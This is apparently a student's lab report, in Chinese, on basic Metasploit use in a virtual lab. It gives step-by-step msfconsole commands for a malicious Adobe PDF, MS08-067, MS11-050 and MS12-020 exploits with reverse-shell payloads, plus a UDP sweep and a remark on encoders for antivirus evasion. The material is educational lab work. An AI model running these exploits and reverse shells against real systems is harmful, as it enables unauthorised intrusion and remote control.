Exp5 MSF基础运用 20154320 李超

 

实验后回答问题

• 用本身的话解释什么是exploit,payload,encode.
• exploit：起运输的做用，将数据传输到对方主机。
• payload：其实就是指装载的“具体内容”。就至关于shellcode同样。
• encode:对须要传输的文件进行编码，使其达到免杀效果。

实验总结与体会

• 经过此次MSF基础应用的实验。我对MSF里面包括的6个模块都有了必定的认识，先是exploit模块，也就是咱们说的渗透模块，包括主动渗透和被动渗透，老师在课上也生动的讲述了区别，我就不赘述了。exploit起运输的做用，将数据传输到对方主机。 post模块指的是在meterpreter中的那些具体操做，好比抓屏，抓键什么的。而后是payload模块，payload其实就是指装载的“具体内容”。就至关于shellcode同样。若是exploit至关于运载火箭，那么Payload就至关于要投放的弹头。payload有三个子目录，分别是single（独立），stager（传输器），stage（传输体）。encoder对须要传输的文件进行编码，使其达到免杀效果，还能消除像“0x00”这种坏字符；nop是空指令（0x90），在“滑翔区”中有重要的应用。最后一个是Auxiliary辅助模块，这是用来搜集情报的，每个模块都是一个源代码。咱们能够在usr/share/metasploit—framework/modules/中查看每一个模块。

• 操做起来，其实就是一个套路，先肯定攻击模块，使用模块的命令是use， 而后设置攻击载荷set payloads，再是在每一步的时候都要确认参数，使用show options命令观察，show targets能够查看能被攻击的操做系统等等。这里就不赘述了。但具体操做起来，就是会有各类问题，好比浏览器的版本问题，xp虚拟机的版本问题，任何一个小问题，都会让咱们的实验结果不理想。不过还好，最后都一一克服了。也许这就是实验的魅力吧，老师故意给咱们设置不少障碍，而后让咱们本身想办法去跨越障碍，最后到达胜利的终点。重要的不是结果，重要的而是实验的这个过程，这个过程才能真正的让咱们学到东西。不要轻言放弃，要激流勇进，克服一个个困难老是有成就感的！

Adobe阅读器渗透攻击

实验前准备

• 两台虚拟机，其中一台为kali，一台为windows xp sp3。

• 设置虚拟机网络为NAT模式，保证两台虚拟机能够ping通。

• kali下打开显示隐藏文件。

实验过程

• 在kali终端中开启msfconsole。

• 输入命令use exploit/windows/fileformat/adobecooltypesing，进入该漏洞模块的使用。

• 使用命令set payload windows/meterpreter/reverse_tcp设置攻击有效载荷。

• 输入命令show options显示咱们须要在攻击前须要设置的数据。

• set FILENAME xxx.pdf

• set LHOST "KALI 的 Ip"

• set LPORT xxxx

• 输入exploit,生成pdf文件，能够看到pdf所在文件夹，将pdf复制到靶机里。

 

 

 

 

• 使用命令back退出当前模块，并使用use exploit/multi/handler新建一个监听模块。具体过程不赘述。

• 使用命令exploit开始攻击，在xp中打开pdf。这里pdf比较难打开。咱们能够选择在kali中等结果。

• 最开始回连不成功，需将网络改为NAT模式
• 以后回连成功

 

 

 

 

 

 

• 在靶机xp中使用命令netstat -an,看本地tcp链接。

 

MS08_067漏洞渗透攻击实践

实验前准备

• 两台虚拟机，其中一台为kali，一台为windows xp sp3(英文版)。

• 在VMware中设置两台虚拟机网络为NAT模式，自动分配IP地址，以后两台虚拟机就能够直接ping通。

实验过程

• 最开始ping了半天，ping不通，后来发现是ip地址不在同一个网段上，须要从新设置xp的ip地址。具体过程不赘述，地球人都会。由于这里是c类地址，因此前三位同样。个人kali ip是192.168.124.130，xp ip设置为：192.168.124.128。

• 在kali终端中开启msfconsole。

• 而后输入命令search ms08_067,会显示出找到的渗透模块。

 

• 输入命令use exploit/windows/smb/ms08067netapi，进入该漏洞模块的使用。

• 再输入命令show payload会显示出有效的攻击载荷。

 

• show targets会显示出能够被攻击的靶机的操做系统型号。

 

• 使用命令set payload generic/shell_reverse_tcp设置攻击有效载荷。再输入命令show options显示咱们须要在攻击前须要设置的数据，以下图红框圈住的部分。

 

• set LHOST "kali Ip"

• set RHOST "Win xp Ip"

 

• 看看两个主机能不能ping通。

 

• exploit开始攻击，第一次失败，关闭防火墙后成功
• 在kali上执行ipconfig/all。

 

 

 

 

• 在win xp上执行一样的命令，以下图所示：

 

辅助模块：udp_sweep

实验前准备

• 两台虚拟机，其中一台为kali，一台为windows xp sp2/3。

• 设置虚拟机网络为NAT模式，保证两台虚拟机能够相互间ping通（关闭靶机防火墙）。

•  

  模块介绍

  • 使用udp对指定IP地址主机进行udp扫描

  实践过程

  • 利用该模块填写目的IP来对目的IP地址进行扫描

•  

•  

   

IE浏览器渗透攻击——MS11050安全漏洞

实验前准备

• 两台虚拟机，其中一台为kali，一台为windows xp sp3（包含IE7）。

• 设置虚拟机网络为NAT模式，保证两台虚拟机能够相互间ping通（关闭靶机防火墙）。

实验步骤

• 在kali终端中开启msfconsole。

• 输入命令use windows/browser/ms11050mshtml_cobjectelement，进入该漏洞模块。

• 输入info查看信息：

 

• show targets看看目标：

 

• 再show option，都是老套路。

 

 

• 而后exploit攻击！能够看见生成一个网址。

 

 

 

 

• 这个时候kali中显示一个session 1已经建立，输入命令sessions -i 1,开始链接。而后攻击成功了

 

MS12-020漏洞攻击

         远程桌面协议（端口号：3389）

         Windows在处理某些对象时存在错误，可经过特制的RDP报文访问未初始化的或已经删除的对象，致使任意代码执行，而后控制系统。

serch ms-12-020

 

 设置RHOST

 

exploit